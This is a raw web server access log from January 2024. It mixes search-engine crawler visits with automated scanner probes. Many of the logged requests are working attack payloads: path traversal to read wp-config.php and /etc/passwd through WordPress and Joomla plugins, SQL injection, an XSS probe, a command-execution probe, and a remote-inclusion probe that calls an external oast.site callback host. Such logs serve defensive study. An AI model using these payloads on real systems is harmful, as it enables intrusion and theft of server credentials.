195.43.7.205 - - [25/Jan/2024:04:41:39 +0700] "GET //wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php HTTP/1.1" 302 294 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:40 +0700] "GET //wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php HTTP/1.1" 302 316 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:41 +0700] "GET //wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1" 302 286 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
195.43.7.205 - - [25/Jan/2024:04:41:42 +0700] "GET //wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php HTTP/1.1" 302 297 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
216.244.66.201 - - [25/Jan/2024:05:21:10 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
103.131.71.179 - - [25/Jan/2024:08:18:50 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
138.2.41.172 - - [25/Jan/2024:08:44:27 +0700] "GET /wp-content/plugins/index.php HTTP/1.1" 302 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.249.79.34 - - [25/Jan/2024:10:57:15 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.34 - - [25/Jan/2024:11:55:49 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.34 - - [25/Jan/2024:12:03:28 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.36 - - [25/Jan/2024:14:31:59 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.34 - - [25/Jan/2024:17:55:48 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.138 - - [25/Jan/2024:17:55:48 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.98 - - [25/Jan/2024:18:54:14 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.96 - - [25/Jan/2024:19:54:28 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.78.150.221 - - [25/Jan/2024:20:10:18 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
116.98.1.98 - - [25/Jan/2024:21:06:34 +0700] "GET / HTTP/1.1" 302 217 "https://www.google.com.vn/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
168.138.41.19 - - [25/Jan/2024:21:56:20 +0700] "GET /wp-content/plugins/core/include.php HTTP/1.1" 302 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.249.77.97 - - [26/Jan/2024:01:32:30 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.138 - - [26/Jan/2024:02:32:12 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.150 - - [26/Jan/2024:03:02:53 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.186 - - [26/Jan/2024:03:02:55 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.38 - - [26/Jan/2024:03:09:22 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.38 - - [26/Jan/2024:03:09:24 +0700] "GET /images/logos/logoo2x.jpg HTTP/1.1" 302 241 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.77.96 - - [26/Jan/2024:07:49:41 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.98 - - [26/Jan/2024:07:49:42 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.55.199.237 - - [26/Jan/2024:08:07:10 +0700] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 302 265 "-" "-"
66.249.71.136 - - [26/Jan/2024:08:48:44 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.96 - - [26/Jan/2024:09:47:21 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
68.183.197.201 - - [26/Jan/2024:10:26:22 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
66.249.71.136 - - [26/Jan/2024:10:45:46 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.137 - - [26/Jan/2024:12:03:41 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.235 - - [26/Jan/2024:20:35:11 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
66.249.71.138 - - [26/Jan/2024:21:29:08 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.196 - - [26/Jan/2024:21:29:09 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.245.14.216 - - [26/Jan/2024:21:57:43 +0700] "GET /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd HTTP/1.1" 302 305 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:43 +0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd HTTP/1.1" 302 308 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:44 +0700] "GET /webui/?g=sys_dia_data_down&file_name=../etc/passwd HTTP/1.1" 302 271 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:44 +0700] "GET /s=set&_method=__construct&method=*&filter[]=system HTTP/1.1" 302 283 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:44 +0700] "GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1" 302 303 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:44 +0700] "GET /tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini HTTP/1.1" 302 302 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:44 +0700] "GET /authenticationserverservlet HTTP/1.1" 302 244 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:44 +0700] "GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 226 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:44 +0700] "GET /tool/log/c.php?strip_slashes=printf&host=nl+c.php HTTP/1.1" 302 270 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:44 +0700] "GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1" 302 261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:44 +0700] "GET /install/ HTTP/1.1" 302 225 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:44 +0700] "GET /api/dp/rptsvcsyncpoint?ccid=1 HTTP/1.1" 302 246 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:44 +0700] "GET /index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 302 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:44 +0700] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd HTTP/1.1" 302 328 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:44 +0700] "GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1" 302 302 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /src/redirect.php?plugins[]=../../../../etc/passwd%00 HTTP/1.1" 302 269 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1" 302 372 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /index.php?option=com_imagebrowser&folder=../../../../etc/passwd HTTP/1.1" 302 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=ozwth.txt HTTP/1.1" 302 316 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 302 249 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1" 302 279 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 305 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 305 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 302 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /get_dkey.php?user=admin HTTP/1.1" 302 240 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 HTTP/1.1" 302 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1" 302 291 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1" 302 265 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 308 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1" 302 307 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd HTTP/1.1" 302 307 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 306 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1" 302 331 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /adm/krgourl.php?DOCUMENT_ROOT=http://cmpqd87diecumo0p7gd04anpd11f1ncsw.oast.site HTTP/1.1" 302 297 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:45 +0700] "GET /s=set&_method=__construct&method=*&filter[]=system HTTP/1.1" 302 283 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 305 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 303 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "POST /bsh.servlet.BshServlet HTTP/1.1" 302 239 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1" 302 255 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "GET /web/xml/webuser-auth.xml HTTP/1.1" 302 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 302 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 313 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "POST /scripts/setup.php HTTP/1.1" 302 234 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 307 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "GET /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 308 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "GET /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 310 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "GET /index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd HTTP/1.1" 302 300 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 308 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "GET /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 304 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:46 +0700] "GET /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 305 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:47 +0700] "POST /mobile/plugin/browser.jsp HTTP/1.1" 302 242 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:47 +0700] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 302 258 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:47 +0700] "GET /level/16/exec/show/config/CR HTTP/1.1" 302 245 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:47 +0700] "GET /index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 306 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:48 +0700] "GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 303 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:48 +0700] "GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:48 +0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 316 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:49 +0700] "GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1" 302 290 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:49 +0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1" 302 363 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:49 +0700] "GET /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 310 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:49 +0700] "GET /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 315 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:49 +0700] "GET /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:50 +0700] "GET /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 308 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:50 +0700] "GET /pandora_console/ajax.php?page=../../../../../../etc/passwd HTTP/1.1" 302 275 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:50 +0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 321 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:51 +0700] "GET /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 311 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
